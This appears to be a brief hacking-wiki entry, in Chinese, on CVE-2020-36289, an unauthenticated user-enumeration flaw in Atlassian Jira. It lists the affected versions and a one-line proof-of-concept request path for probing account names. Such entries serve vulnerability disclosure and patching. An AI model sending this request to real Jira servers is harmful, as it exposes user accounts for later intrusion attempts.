Loading
0

CVE-2020-36289 Atlassian Jira Unauth 用户枚举漏洞

pwnwiki.com

,

影响版本

Jira < 8.5.13
8.6.0 ≤ Jira < 8.13.5
8.14.0 ≤ Jira < 8.15.1

POC

/secure/QueryComponentRendererValue!Default.jspa?assignee=user:admin

截图

Twitter E3k2 J4VIAAWR 6.jpg

PWNWIK.COM